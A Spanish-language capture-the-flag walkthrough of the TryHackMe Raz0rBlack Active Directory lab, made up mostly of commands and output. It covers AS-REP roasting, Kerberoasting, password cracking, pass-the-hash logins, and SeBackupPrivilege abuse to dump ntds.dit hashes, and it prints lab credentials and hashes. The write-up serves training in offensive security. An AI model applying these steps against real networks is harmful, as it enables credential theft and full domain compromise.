Enumeración
Iniciamos la máquina escaneando los puertos de la máquina con nmap, aunque realmente solo encontramos varios puertos abiertos, todos comunes en un AD
❯ nmap 10.10.235.231
Nmap scan report for 10.10.235.231
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2049/tcp open nfs
3268/tcp open globalcatLDAP
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49678/tcp open unknown
49693/tcp open unknown
Con crackmapexec podemos hacer una petición a nivel de SMB donde ademas del nombre de la máquina encontramos el dominio al que se asocian los equipos
❯ crackmapexec smb 10.10.235.231
SMB 10.10.235.231 445 HAVEN-DC [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
Para posibles proximos ataques o simplemente comodidad agregaremos el dominio al archivo /etc/hosts para que sepa a donde apuntar con el dominio
❯ echo "10.10.235.231 raz0rblack.thm" | sudo tee -a /etc/hosts
El puerto 2049 esta abierto asi que podemos listar todas las monturas disponibles en la maquina con showmount, existe una para todos con el nombre /users
❯ showmount -e raz0rblack.thm
Export list for raz0rblack.thm:
/users (everyone)
Con mount como root podemos montar la montura /users en el directorio /mnt
❯ sudo mount raz0rblack.thm:/users /mnt/
Ahora como root listamos los archivos en /mnt, en el encontramos un txt que contiene lo que parece una flag, ademas de un archivo xlsx de excel
/mnt ❯ ls
employee_status.xlsx sbradley.txt
❯ cat sbradley.txt
THM{ab53e05c9a98def00314a14ccbfa8104}
El archivo de excel simplemente contiene una lista de usuarios y sus roles
Un estandar que se suele usar en nombres de usuarios es usar la primera letra del primer nombre y el apellido por ejemplo daven port pasa a ser simplemente dport
❯ cat users.txt
dport
iroyce
tvidal
aedwards
cingram
ncassidy
rzaydan
lvetrova
rdelgado
twilliams
sbradley
clin
Teniendo esta lista de usuarios podemos comprobar con kerbrute cuales son validos a nivel de dominio, esto reduce nuestra lista a solo 3 usuarios válidos
❯ kerbrute userenum -d raz0rblack.thm --dc raz0rblack.thm users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
> Using KDC(s):
> raz0rblack.thm:88
> [+] VALID USERNAME: twilliams@raz0rblack.thm
> [+] VALID USERNAME: lvetrova@raz0rblack.thm
> [+] VALID USERNAME: sbradley@raz0rblack.thm
> Done! Tested 12 usernames (3 valid) in 0.160 seconds
❯ cat users.txt
lvetrova
twilliams
sbradley
Tenemos una lista de usuarios validos, podemos probar un ataque ASREPRoast para ver si uno de ellos es vulnerable, al hacerlo twilliams nos devuelve su hash
❯ impacket-GetNPUsers raz0rblack.thm/ -no-pass -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$twilliams@RAZ0RBLACK.THM:fbc529788a44ef5c2609713e70f56267$cd563030f0ce7cda49a891e0ece22c039e77a97763c4286dffa642976a0b2e5582ad6d98eacda2c2c24264a8af7ce122f7f97a129a5be7331e307a563b85d63e1cf602ddd19abeae347e92bc9c5a40e81752dd308ba69e3a8feaa3a271b2ea53270700781d3557f1155f3b7a5eb87655cbfd3ba641a278ea948b80b58c4ecbb832f0b17c24a2ee42b620d8a0cccca200c4e3f50b88dec411f9e1055d73d2e779a9e424c1c3d59b1680514c0aff4671e0a459ef59783546875869374d3beb4a23cc839ed94272b6577cd89b715db9014b888fb3f31b213597bf6b7aaa23055a70182eab6579993337a647439f7b15e1d1
[-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set
Podemos crackearlo facilmente con john y ver la contraseña del usuario twilliams
❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 XOP 4x2])
Press 'q' or Ctrl-C to abort, almost any other key for status
roastpotatoes ($krb5asrep$23$twilliams@RAZ0RBLACK.THM)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Comprobamos con crackmapexec que son validas y listamos recursos compartidos en smb, tenemos permiso de lectura en algunos recursos por defecto
❯ crackmapexec smb raz0rblack.thm -u twilliams -p roastpotatoes --shares
SMB raz0rblack.thm 445 HAVEN-DC [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB raz0rblack.thm 445 HAVEN-DC [+] raz0rblack.thm\twilliams:roastpotatoes
SMB raz0rblack.thm 445 HAVEN-DC [+] Enumerated shares
SMB raz0rblack.thm 445 HAVEN-DC Share Permissions Remark
SMB raz0rblack.thm 445 HAVEN-DC ----- ----------- ------
SMB raz0rblack.thm 445 HAVEN-DC ADMIN$ Remote Admin
SMB raz0rblack.thm 445 HAVEN-DC C$ Default share
SMB raz0rblack.thm 445 HAVEN-DC IPC$ READ Remote IPC
SMB raz0rblack.thm 445 HAVEN-DC NETLOGON READ Logon server share
SMB raz0rblack.thm 445 HAVEN-DC SYSVOL READ Logon server share
SMB raz0rblack.thm 445 HAVEN-DC trash Files Pending for deletion
Access - sbradley
Podemos probar esa contreaseña, hacia los otros usuarios, sbradley no devuelve que es incorrecta sino un error de que es necesario cambiar la contraseña
❯ crackmapexec smb raz0rblack.thm -u users.txt -p roastpotatoes --continue-on-success
SMB raz0rblack.thm 445 HAVEN-DC [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB raz0rblack.thm 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:roastpotatoes STATUS_LOGON_FAILURE
SMB raz0rblack.thm 445 HAVEN-DC [+] raz0rblack.thm\twilliams:roastpotatoes
SMB raz0rblack.thm 445 HAVEN-DC [-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE
Usamos smbpasswd para cambiar la actual contraseña a una que sea facil como lo es password123, la contraseña de sbradley se cambia correctamente
❯ impacket-smbpasswd raz0rblack.thm/sbradley:roastpotatoes@10.10.235.231 -newpass password123
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
Comprobamos con crackmapexec y nos devuelve que son correctas, en los recursos compartidos por smb podemos ver que tenemos privilegio de lectura en trash
❯ crackmapexec smb raz0rblack.thm -u sbradley -p password123 --shares
SMB raz0rblack.thm 445 HAVEN-DC [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB raz0rblack.thm 445 HAVEN-DC [+] raz0rblack.thm\sbradley:password123
SMB raz0rblack.thm 445 HAVEN-DC [+] Enumerated shares
SMB raz0rblack.thm 445 HAVEN-DC Share Permissions Remark
SMB raz0rblack.thm 445 HAVEN-DC ----- ----------- ------
SMB raz0rblack.thm 445 HAVEN-DC ADMIN$ Remote Admin
SMB raz0rblack.thm 445 HAVEN-DC C$ Default share
SMB raz0rblack.thm 445 HAVEN-DC IPC$ READ Remote IPC
SMB raz0rblack.thm 445 HAVEN-DC NETLOGON READ Logon server share
SMB raz0rblack.thm 445 HAVEN-DC SYSVOL READ Logon server share
SMB raz0rblack.thm 445 HAVEN-DC trash READ Files Pending for deletion
Nos conectamos al recurso trash con smbclient donde encontramos varios archivos existentes, con mget simplemente podemos descargar todos ellos
❯ impacket-smbclient raz0rblack.thm/sbradley:password123@10.10.235.231
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# use trash
# ls
drw-rw-rw- 0 Tue Mar 16 02:01:28 2021 .
drw-rw-rw- 0 Tue Mar 16 02:01:28 2021 ..
-rw-rw-rw- 1340 Thu Feb 25 14:29:05 2021 chat_log_20210222143423.txt
-rw-rw-rw- 18927164 Tue Mar 16 02:02:20 2021 experiment_gone_wrong.zip
-rw-rw-rw- 37 Sat Feb 27 14:24:21 2021 sbradley.txt
# mget *
[*] Downloading chat_log_20210222143423.txt
[*] Downloading experiment_gone_wrong.zip
[*] Downloading sbradley.txt
#
Leamos los txt, el primero nos muestra una flag que ya habiamos visto antes, el segundo un log de un chat entre el usuario Administrator y sbradley
❯ cat sbradley.txt
THM{ab53e05c9a98def00314a14ccbfa8104}
❯ cat chat_log_20210222143423.txt
sbradley> Hey Administrator our machine has the newly disclosed vulnerability for Windows Server 2019.
Administrator> What vulnerability??
sbradley> That new CVE-2020-1472 which is called ZeroLogon has released a new PoC.
Administrator> I have given you the last warning. If you exploit this on this Domain Controller as you did previously on our old Ubuntu server with dirtycow, I swear I will kill your WinRM-Access.
sbradley> Hey you won't believe what I am seeing.
Administrator> Now, don't say that you ran the exploit.
sbradley> Yeah, The exploit works great it needs nothing like credentials. Just give it IP and domain name and it resets the Administrator pass to an empty hash.
sbradley> I also used some tools to extract ntds. dit and SYSTEM.hive and transferred it into my box. I love running secretsdump.py on those files and dumped the hash.
Administrator> I am feeling like a new cron has been issued in my body named heart attack which will be executed within the next minute.
Administrator> But, Before I die I will kill your WinRM access..........
sbradley> I have made an encrypted zip containing the ntds.dit and the SYSTEM.hive and uploaded the zip inside the trash share.
sbradley> Hey Administrator are you there ...
sbradley> Administrator .....
The administrator died after this incident.
Press F to pay respects
Shell - lvetrova
Al intentar descomprimir el zip que descargamos antes nos pide una contraseña
❯ unzip experiment_gone_wrong.zip
Archive: experiment_gone_wrong.zip
[experiment_gone_wrong.zip] system.hive password:
Con zip2john podemos crear un hash del zip y con john obtenemos la contraseña
❯ zip2john experiment_gone_wrong.zip > hash
❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
electromagnetismo (experiment_gone_wrong.zip)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Ya con la contraseña podemos unzipear el comprimido el cual nos deja 2 archivos, system.hive y ntds.dit los cuales contienen información importante del dominio
❯ unzip experiment_gone_wrong.zip
Archive: experiment_gone_wrong.zip
[experiment_gone_wrong.zip] system.hive password: electromagnetismo
inflating: system.hive
inflating: ntds.dit
Con secretsdump podemos en local dumpear todos hashes de los usuarios del dominio, con expresiones regulares obtenemos solo los hashes NT, en total 1866
❯ impacket-secretsdump LOCAL -system system.hive -ntds ntds.dit > dump
❯ grep ::: dump | awk '{print $4}' FS=':' > hashes.txt
❯ wc -l hashes.txt
1866 hashes.txt
De los 3 usuarios validos solo nos falta la contraseña de lvetrova, podemos con crackmapexec probar si alguno de todos los hashes es válido, obtenemos su hash
❯ crackmapexec smb raz0rblack.thm -u lvetrova -H hashes.txt
SMB raz0rblack.thm 445 HAVEN-DC [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB raz0rblack.thm 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:1afedc472d0fdfe07cd075d36804efd0 STATUS_LOGON_FAILURE
SMB raz0rblack.thm 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
SMB raz0rblack.thm 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:42263cad4fc3f45816c340e684e2592a STATUS_LOGON_FAILURE
.....................................................................................................................................
SMB raz0rblack.thm 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:7b8b14a73d8a45249de2f5b0c225d515 STATUS_LOGON_FAILURE
SMB raz0rblack.thm 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:081af9630677a387f6f0a9bb17852602 STATUS_LOGON_FAILURE
SMB raz0rblack.thm 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:c184a72ed800899bc1ff633778a89b5e STATUS_LOGON_FAILURE
SMB raz0rblack.thm 445 HAVEN-DC [+] raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d
Podemos usar este para mediante un passthehash autenticarnos a la máquina como el usuario lvetrova, la autenticacion es válida tanto para smb como para winrm
❯ crackmapexec winrm raz0rblack.thm -u lvetrova -H f220d3988deb3f516c73f40ee16c431d
SMB raz0rblack.thm 5985 HAVEN-DC [*] Windows 10.0 Build 17763 (name:HAVEN-DC) (domain:raz0rblack.thm)
HTTP raz0rblack.thm 5985 HAVEN-DC [*] http://raz0rblack.thm:5985/wsman
WINRM raz0rblack.thm 5985 HAVEN-DC [+] raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d (Pwn3d!)
Ahora simplemente nos conectamos con evil-winrm para obtener una powershell
❯ evil-winrm -i raz0rblack.thm -u lvetrova -H f220d3988deb3f516c73f40ee16c431d
PS C:\Users\lvetrova\Documents> whoami
raz0rblack\lvetrova
PS C:\Users\lvetrova\Documents>
En su directorio home encontramos un archivo xml con su nombre de usuario el cual contene una cadena bastante larga la cual es una credencial con PSCredential
PS C:\Users\lvetrova> dir
Directory: C:\Users\lvetrova
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 12:19 AM Desktop
d-r--- 2/25/2021 10:14 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
-a---- 2/25/2021 10:16 AM 1692 lvetrova.xml
PS C:\Users\lvetrova> type lvetrova.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">Your Flag is here =></S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009db56a0543f441469fc81aadb02945d20000000002000000000003660000c000000010000000069a026f82c590fa867556fe4495ca870000000004800000a0000000100000003b5bf64299ad06afde3fc9d6efe72d35500000002828ad79f53f3f38ceb3d8a8c41179a54dc94cab7b17ba52d0b9fc62dfd4a205f2bba2688e8e67e5cbc6d6584496d107b4307469b95eb3fdfd855abe27334a5fe32a8b35a3a0b6424081e14dc387902414000000e6e36273726b3c093bbbb4e976392a874772576d</SS>
</Props>
</Obj>
</Objs>
PS C:\Users\lvetrova>
Podemos cargar el xml y obtener la credencial en la variable $Cred, de la variable seleccionamos los valores UserName y Password, ahora podemos ver la flag
PS C:\Users\lvetrova> $Cred = Import-Clixml -Path lvetrova.xml
PS C:\Users\lvetrova> $Cred.GetNetworkCredential() | Select UserName,Password
UserName Password
-------- --------
Your Flag is here => THM{694362e877adef0d85a92e6d17551fe4}
PS C:\Users\lvetrova>
Shell - xyan1d3
Para poder enumerar privilegios e información del dominio podemos subir el módulo de SharpHound.ps1 e importarlo en la powershell para usar sus funciones
PS C:\Users\lvetrova\Documents> upload SharpHound.ps1
Info: Uploading SharpHound.ps1 to C:\Users\lvetrova\Documents\SharpHound.ps1
Data: 1757460 bytes of 1757460 bytes copied
Info: Upload successful!
PS C:\Users\lvetrova\Documents> Import-Module .\SharpHound.ps1
PS C:\Users\lvetrova\Documents>
Invocamos bloodhound indicando que queremos enumerar todo, al terminar esto nos creara un zip con la información que podemos descargar con la función download
PS C:\Users\lvetrova\Documents> Invoke-Bloodhound -CollectionMethod All
PS C:\Users\lvetrova\Documents> dir
Directory: C:\Users\lvetrova\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/11/2023 10:04 PM 11661 20230511220419_BloodHound.zip
-a---- 5/11/2023 9:46 PM 1318097 SharpHound.ps1
PS C:\Users\lvetrova\Documents> download 20230511220419_BloodHound.zip BH.zip
Info: Downloading C:\Users\lvetrova\Documents\20230511220419_BloodHound.zip to BH.zip
Info: Download successful!
PS C:\Users\lvetrova\Documents>
Subimos el zip a bloodhound y al listar las cuentas del dominio kerberoasteables encontramos a el usuario xyan1d3 además del tipico krbtgt que viene por defecto
Podemos usar GetUserSPNs con las credenciales de el usuario ltrova o cualquiera de las 3 que tenemos para hacer una petición y ver el hash del usuario xyan1d3
❯ impacket-GetUserSPNs raz0rblack.thm/lvetrova -hashes :f220d3988deb3f516c73f40ee16c431d -request
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- ------- ---------------------------------------------------------- -------------------------- --------- ----------
HAVEN-DC/xyan1d3.raz0rblack.thm:60111 xyan1d3 CN=Remote Management Users,CN=Builtin,DC=raz0rblack,DC=thm 2021-02-23 10:17:17.715160
$krb5tgs$23$*xyan1d3$RAZ0RBLACK.THM$raz0rblack.thm/xyan1d3*$76f40957d6006a44aff9be824bb11b50$72498e93c1fd6d9044a765c54213efd1cec2978dc6e83dd991efc3516bbbae13a011fbbb42e4da014fca844c34530236ced8742a55346ea3ef421187bb4f0fb865ed73a09fb0622596d6477d84b259c7d71fe6ee02db9351928172839e23511adcd0bb8c94a4494799d4893a0447850fef1ca4c0f787925eceab4ae9b3ef004b8c8e7ae8c3086cd202eef20c475edb77a41604758db2fed5f8e90f48fdd26ad04bc87ea87d2a742d96fdba000f9d8702aa72a2a07917db05a15cc6b0c3c8e02b22647b409e56a9d55c778724c8a2c410611228cf47f8f2dc8080f458c4afc328793c3d819ead01565280217643c3d3d038d091a27e30eff3bde704fc62a45c6aa9c49bf3f8f63a8c6218b9ffd92e2ade59026fb5864806dd169fa8f2d1915f837bbe0725d3a501505e00a9092f0785f80ec7a756c5059b0a21a3e46e7fab49b58766db1e69a80432e92548647e8e202e35284c058ce3161bd01de42644ba8e89a711f3fd88ec89b54f366947d581790e30d730f2b5dfdfde16c9d6165be306f379d64b80b9643270a7fb4fce43282c1d0b001dd71ce6d8980b5085ae4b08a1bded72d01a66f8fb4c47b4623d4fd6e296642c54430a705db850b8e0be93c2909b9623e3cadaf6dffd0e4aa8425999f2c0397d0c745880ad9db6f65f8a0d6f8935f617946c70e9707de0f40727a31b25d5fb8e423aa3c0ee68fdc4c6c645083a9e7376be5b61e7040c70b44350de288c67e68e469945fe1f4ce44b6323ef0c633a0df6b797bc7a9072cd201650f9c5c5e1dfdac755a935a2f37aafd3c33c3dc388dd0d2951c6eaf3ecc4121959b0918eb22a7d0aded24cefd1774aa4dc55b76b259ed48e3aabf2963d1f1648352c4714fa88d77e99b133695105f5e2e50aa961e8f8645f2439e0d94da2356122632d55323537410405dab5fd066ea9678469afebb90ad790f4fbcf636224c47f514b0c12dfe3dcaf5b06aefef2be5b813c75ae3e236fcb2df42a1ab1007b3da6141d5a23c464485a3f49ed3acf4795664a8cb89d8546dc113bdd012a48b4c84e52b98799312f6833d1a7bb1fd3b48920fa4365c5d4a969e068556ee2f1d1e159773aed385fb1743635c4bcb16e2fdb63f8ceec248f931a2974e6d4387963fcf56e7bcec3f3a4bd2c11df9d2e98b09386164388d98860569aa0b1a941bc0b8f372adebbd9b18fc2f21cbc9e88188cb5d39c8ae92c09fdab894a57149726f890b55b2a31f9a5d9b2f010b856bb14e48d056149d83baf21023090abaf98421bd9a17556e887bde64c9011e57687c4fee021c87548aa4447ccaa560b5d4aff842f10e8b9f3098b5711559aa9d956910aaf7fedf08ec173b309b4b7f972349aa65d6ead354e68fc54bc2f6a4f66ecbdafa54fa3f653acfda10efe50ccc3f2aa3b719abc112e
Usando john podemos romper el hash facilmente y ver la contraseña de xyan1d3
❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Press 'q' or Ctrl-C to abort, almost any other key for status
cyanide9amine5628 (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Las comprobamos con crackmapexec y son validas tanto para smb como para winrm
❯ crackmapexec smb raz0rblack.thm -u xyan1d3 -p cyanide9amine5628
SMB raz0rblack.thm 445 HAVEN-DC [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB raz0rblack.thm 445 HAVEN-DC [+] raz0rblack.thm\xyan1d3:cyanide9amine5628
❯ crackmapexec winrm raz0rblack.thm -u xyan1d3 -p cyanide9amine5628
SMB raz0rblack.thm 5985 HAVEN-DC [*] Windows 10.0 Build 17763 (name:HAVEN-DC) (domain:raz0rblack.thm)
HTTP raz0rblack.thm 5985 HAVEN-DC [*] http://raz0rblack.thm:5985/wsman
WINRM raz0rblack.thm 5985 HAVEN-DC [+] raz0rblack.thm\xyan1d3:cyanide9amine5628 (Pwn3d!)
Nuevamente nos podemos conectar a la maquina evil-winrm y obtener una shell
❯ evil-winrm -i raz0rblack.thm -u xyan1d3 -p cyanide9amine5628
PS C:\Users\xyan1d3\Documents> whoami
raz0rblack\xyan1d3
PS C:\Users\xyan1d3\Documents>
Nuevamente encontramos un xml, solo repetimos el procedimiento para ver la flag
PS C:\Users\xyan1d3> dir
Directory: C:\Users\xyan1d3
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 12:19 AM Desktop
d-r--- 2/25/2021 9:34 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
-a---- 2/25/2021 9:33 AM 1826 xyan1d3.xml
PS C:\Users\xyan1d3> type xyan1d3.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">Nope your flag is not here</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000006bc3424112257a48aa7937963e14ed790000000002000000000003660000c000000010000000f098beb903e1a489eed98b779f3c70b80000000004800000a000000010000000e59705c44a560ce4c53e837d111bb39970000000feda9c94c6cd1687ffded5f438c59b080362e7e2fe0d9be8d2ab96ec7895303d167d5b38ce255ac6c01d7ac510ef662e48c53d3c89645053599c00d9e8a15598e8109d23a91a8663f886de1ba405806944f3f7e7df84091af0c73a4effac97ad05a3d6822cdeb06d4f415ba19587574f1400000051021e80fd5264d9730df52d2567cd7285726da2</SS>
</Props>
</Obj>
</Objs>
PS C:\Users\xyan1d3> $Cred = Import-Clixml -Path xyan1d3.xml
PS C:\Users\xyan1d3> $Cred.GetNetworkCredential() | Select UserName,Password
UserName Password
-------- --------
Nope your flag is not here LOL here it is -> THM{62ca7e0b901aa8f0b233cade0839b5bb}
PS C:\Users\xyan1d3>
Shell - Administrator
Entre los privilegios del usuario podemos ver el privilegio SeBackupPrivilege habilitado, esta explotación será exactamente la misma que en en endgame XEN
PS C:\Users\xyan1d3> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\Users\xyan1d3>
Sin embargo no tenemos una consola completamente interactiva para poder usar diskshadow, asi que crearemos un txt con todos los comendos que este ejecutará
❯ cat cmd.txt
set context persistent nowriters
add volume C: alias xyz
set metadata C:\ProgramData\xyz.cab
create
expose %xyz% X:
Subimos el txt y con diskshadow usando el parametro /s indicamos el archivo, este ejecutara los comando que definimos para crear la copia xyz y exponerla en X:
PS C:\ProgramData> diskshadow /s cmd.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: HAVEN-DC, 5/11/2023 10:09:10 PM
-> set context persistent nowriters
-> add volume C: alias xyz
-> set metadata C:\ProgramData\xyz.cab
-> create
Alias xyz for shadow ID {c93ddbda-2e97-4022-bbcb-d481ee4414c0} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {8d6f4001-e40e-473a-ade5-21a2857c9eb6} set as environment variable.
Querying all shadow copies with the shadow copy set ID {8d6f4001-e40e-473a-ade5-21a2857c9eb6}
* Shadow copy ID = {c93ddbda-2e97-4022-bbcb-d481ee4414c0} %xyz%
- Shadow copy set: {8d6f4001-e40e-473a-ade5-21a2857c9eb6} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{115c1f55-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 5/11/2023 10:09:14 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: HAVEN-DC.raz0rblack.thm
- Service machine: HAVEN-DC.raz0rblack.thm
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %xyz% X:
-> %xyz% = {c93ddbda-2e97-4022-bbcb-d481ee4414c0}
The shadow copy was successfully exposed as X:\.
->
PS C:\ProgramData>
Con la función upload incluida en evil-winrm podemos subir un par de dlls que nos ayudaran a explotar este privilegio, después los importamos como modulos
PS C:\ProgramData> upload SeBackupPrivilegeUtils.dll
Info: Uploading SeBackupPrivilegeUtils.dll to C:\ProgramData\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
PS C:\ProgramData> upload SeBackupPrivilegeCmdLets.dll
Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\ProgramData\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
PS C:\ProgramData> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\ProgramData> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\ProgramData>
Ahora copiamos los archivos ntds.dit que contiene los hashes de todos los usuarios del dominio y SYSTEM de la copia creada accediendo desde la unidad X:
PS C:\ProgramData> Copy-FileSeBackupPrivilege X:\Windows\NTDS\ntds.dit ntds.dit
PS C:\ProgramData> Copy-FileSeBackupPrivilege X:\Windows\System32\Config\SYSTEM SYSTEM
PS C:\ProgramData>
Podemos conectarnos con smbclient de impacket y usando el recurso C$, entrar a la carpeta ProgramData donde tenemos nuestros archivos y descargarlos con get
❯ impacket-smbclient raz0rblack.thm/xyan1d3:cyanide9amine5628@10.10.235.231
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# use C$
# cd ProgramData
# get SYSTEM
# get ntds.dit
#
Ahora en local con la herramienta secretsdump de impacket, le pasamos el SYSTEM y el ntds.dit que hemos descargado dumpeamos todos los hashes del dominio
❯ impacket-secretsdump LOCAL -system SYSTEM -ntds ntds.dit
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0xf1582a79dd00631b701d3d15e75e59f6
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f6162bb347993035d66a15417d73a667
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9689931bed40ca5a2ce1218210177f0c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:0ae0e528447968f809c68e7d7363bd8d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fa3c456268854a917bd17184c85b4fd1:::
raz0rblack.thm\xyan1d3:1106:aad3b435b51404eeaad3b435b51404ee:bf11a3cbefb46f7194da2fa190834025:::
raz0rblack.thm\lvetrova:1107:aad3b435b51404eeaad3b435b51404ee:f220d3988deb3f516c73f40ee16c431d:::
raz0rblack.thm\sbradley:1108:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
raz0rblack.thm\twilliams:1109:aad3b435b51404eeaad3b435b51404ee:351c839c5e02d1ed0134a383b628426e:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:ab77c0dd6f5a28b63c4ae5f0eb89ad48f3ed43d52dc42f1dca2e99d8fc9cdbbf
Administrator:aes128-cts-hmac-sha1-96:81a749369e929b7f1731489b12a49df8
Administrator:des-cbc-md5:d3b646b65bceb5c7
HAVEN-DC$:aes256-cts-hmac-sha1-96:c060b6e232cb8055b2b032db367fefd4526c949be19846526a734dda83f1fb1a
HAVEN-DC$:aes128-cts-hmac-sha1-96:ee6f53f26d3d8ed81d59d7eda1d3ea2c
HAVEN-DC$:des-cbc-md5:34fb7c15102ce6b3
krbtgt:aes256-cts-hmac-sha1-96:eed4acbdf1b6cc2b3c1aef992a8cea74d8b0c4ad5b4deecf47c57c4d9465caf5
krbtgt:aes128-cts-hmac-sha1-96:3dbbd202aa0343d1b8df99785d2befbb
krbtgt:des-cbc-md5:857a46f13e91eae3
